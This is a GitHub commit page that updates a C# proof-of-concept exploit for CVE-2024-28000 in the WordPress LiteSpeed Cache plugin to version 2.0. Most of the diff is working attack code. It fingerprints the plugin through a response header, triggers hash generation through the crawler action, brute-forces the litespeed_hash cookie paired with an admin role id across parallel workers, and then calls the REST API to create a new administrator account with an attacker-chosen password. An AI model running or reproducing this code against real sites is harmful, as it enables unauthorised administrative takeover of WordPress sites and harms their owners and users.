Skip to content

Commit

Permalink
By EbraSha
Browse files Browse the repository at this point in the history 
ver 2.0
  • Loading branch information
@ebrasha
ebrasha committed Aug 29, 2024
1 parent 3b21366 commit c6ce3d6
Show file tree
Hide file tree
Showing 5 changed files with 75 additions and 29 deletions.
6 changes: 3 additions & 3 deletions Abdal CVE-2024-28000.csproj
View file
Original file line number Diff line number Diff line change
Expand Up @@ -8,9 +8,9 @@
<Nullable>enable</Nullable>
<ApplicationIcon>Dev\logo.ico</ApplicationIcon>
<PackageIcon>128.png</PackageIcon>
<AssemblyVersion>1.0</AssemblyVersion>
<FileVersion>1.0</FileVersion>
<Version>1.0</Version>
<AssemblyVersion>2.0</AssemblyVersion>
<FileVersion>2.0</FileVersion>
<Version>2.0</Version>
<Copyright>Programmer: Ebrahim Shafiei (EbraSha)</Copyright>
</PropertyGroup>

Expand Down
92 changes: 69 additions & 23 deletions Program.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -22,8 +22,37 @@ class Program

private static readonly HttpClient client = new HttpClient();

static void Main(string[] args)
static async Task<string> CheckLiteSpeedTagAsync(string url)
{
try
{
using (HttpClient client = new HttpClient())
{
HttpResponseMessage response = await client.GetAsync(url);

if (response.Headers.Contains("X-LiteSpeed-Tag"))
{
return "Header Found";
}
else
{
return "The LiteSpeed Cache plugin is not installed on this site.";
}
}
}
catch (HttpRequestException ex)
{
return $"Connection Error: {ex.Message}";
}
catch (Exception ex)
{
return $"General Error: {ex.Message}";
}
}

static async Task Main(string[] args)
{
Console.Title = "Abdal CVE-2024-28000 - POC by EbraSha";
// Display disclaimer
DisplayDisclaimer();

Expand Down Expand Up @@ -54,20 +83,32 @@ static void Main(string[] args)
Console.Write("Enter the new admin password: ");
newUserPassword = Console.ReadLine();

// Seed the random number generator (mimicking mt_srand)
Random random = new Random();
// check LiteSpeed Plugin
string PluginStatus = await CheckLiteSpeedTagAsync(targetUrl);
if (PluginStatus == "Header Found")
{
// Seed the random number generator (mimicking mt_srand)
Random random = new Random();

// Trigger hash generation
TriggerHashGeneration().Wait();

// Trigger hash generation
TriggerHashGeneration().Wait();
// Create and start worker threads
List<Task> tasks = new List<Task>();
for (int i = 0; i < numWorkers; i++)
{
tasks.Add(Task.Run(() => Worker()));
}

// Create and start worker threads
List<Task> tasks = new List<Task>();
for (int i = 0; i < numWorkers; i++)
Task.WaitAll(tasks.ToArray());
}
else
{
tasks.Add(Task.Run(() => Worker()));
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine(PluginStatus);
Console.ReadLine();
Console.ResetColor();
}

Task.WaitAll(tasks.ToArray());
}

private static void DisplayDisclaimer()
Expand All @@ -90,6 +131,7 @@ private static void DisplayBanner()
{
Console.ForegroundColor = ConsoleColor.White;
Console.WriteLine("============================================");
Console.WriteLine(" Abdal CVE-2024-28000 Ver 2.0 ");
Console.WriteLine(" PoC: Ebrahim Shafiei (EbraSha) ");
Console.WriteLine(" Telegram: https://t.me/ProfShafiei ");
Console.WriteLine(" Email: Prof.Shafiei@gmail.com ");
Expand All @@ -102,10 +144,10 @@ private static void DisplayBanner()
private static async Task TriggerHashGeneration()
{
var payload = new Dictionary<string, string>
{
{ "action", "async_litespeed" },
{ "litespeed_type", "crawler" }
};
{
{ "action", "async_litespeed" },
{ "litespeed_type", "crawler" }
};

var content = new FormUrlEncodedContent(payload);
try
Expand All @@ -120,7 +162,8 @@ private static async Task TriggerHashGeneration()
else
{
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine($"[ERROR] Failed to trigger hash generation - Status code: {response.StatusCode}");
Console.WriteLine(
$"[ERROR] Failed to trigger hash generation - Status code: {response.StatusCode}");
Console.ResetColor();
}
}
Expand All @@ -135,10 +178,10 @@ private static async Task TriggerHashGeneration()
private static async Task AttemptHash(string hashValue)
{
var cookies = new Dictionary<string, string>
{
{ "litespeed_hash", hashValue },
{ "litespeed_role", adminUserId }
};
{
{ "litespeed_hash", hashValue },
{ "litespeed_role", adminUserId }
};

var requestMessage = new HttpRequestMessage(HttpMethod.Post, $"{targetUrl}{restApiEndpoint}");
foreach (var cookie in cookies)
Expand All @@ -165,7 +208,8 @@ private static async Task AttemptHash(string hashValue)
else
{
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine($"[ERROR] Unexpected response for hash: {hashValue} - Status code: {response.StatusCode}");
Console.WriteLine(
$"[ERROR] Unexpected response for hash: {hashValue} - Status code: {response.StatusCode}");
Console.ResetColor();
}
}
Expand All @@ -187,7 +231,8 @@ private static async Task CreateAdminUser(Dictionary<string, string> cookies)
roles = new[] { "administrator" }
};

var jsonContent = new StringContent(Newtonsoft.Json.JsonConvert.SerializeObject(userData), Encoding.UTF8, "application/json");
var jsonContent = new StringContent(Newtonsoft.Json.JsonConvert.SerializeObject(userData), Encoding.UTF8,
"application/json");
var requestMessage = new HttpRequestMessage(HttpMethod.Post, $"{targetUrl}{restApiEndpoint}")
{
Content = jsonContent
Expand All @@ -210,7 +255,8 @@ private static async Task CreateAdminUser(Dictionary<string, string> cookies)
else
{
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine($"[ERROR] Failed to create admin user - Status code: {response.StatusCode} - Response: {await response.Content.ReadAsStringAsync()}");
Console.WriteLine(
$"[ERROR] Failed to create admin user - Status code: {response.StatusCode} - Response: {await response.Content.ReadAsStringAsync()}");
Console.ResetColor();
}
}
Expand Down
2 changes: 1 addition & 1 deletion obj/Abdal CVE-2024-28000.csproj.nuget.dgspec.json
View file
Original file line number Diff line number Diff line change
Expand Up @@ -5,7 +5,7 @@
},
"projects": {
"C:\\Users\\EbraSha\\Documents\\Github\\CVE-2024-28000\\Abdal CVE-2024-28000\\Abdal CVE-2024-28000.csproj": {
"version": "1.0.0",
"version": "2.0.0",
"restore": {
"projectUniqueName": "C:\\Users\\EbraSha\\Documents\\Github\\CVE-2024-28000\\Abdal CVE-2024-28000\\Abdal CVE-2024-28000.csproj",
"projectName": "Abdal CVE-2024-28000",
Expand Down
2 changes: 1 addition & 1 deletion obj/project.assets.json
View file
Original file line number Diff line number Diff line change
Expand Up @@ -138,7 +138,7 @@
"C:\\Program Files (x86)\\Progress\\ToolboxNuGetPackages": {}
},
"project": {
"version": "1.0.0",
"version": "2.0.0",
"restore": {
"projectUniqueName": "C:\\Users\\EbraSha\\Documents\\Github\\CVE-2024-28000\\Abdal CVE-2024-28000\\Abdal CVE-2024-28000.csproj",
"projectName": "Abdal CVE-2024-28000",
Expand Down
2 changes: 1 addition & 1 deletion obj/project.nuget.cache
View file
Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
{
"version": 2,
"dgSpecHash": "ILzC+d1/n2E=",
"dgSpecHash": "o9PtRK6WRYY=",
"success": true,
"projectFilePath": "C:\\Users\\EbraSha\\Documents\\Github\\CVE-2024-28000\\Abdal CVE-2024-28000\\Abdal CVE-2024-28000.csproj",
"expectedPackageFiles": [
Expand Down

0 comments on commit c6ce3d6

Please sign in to comment.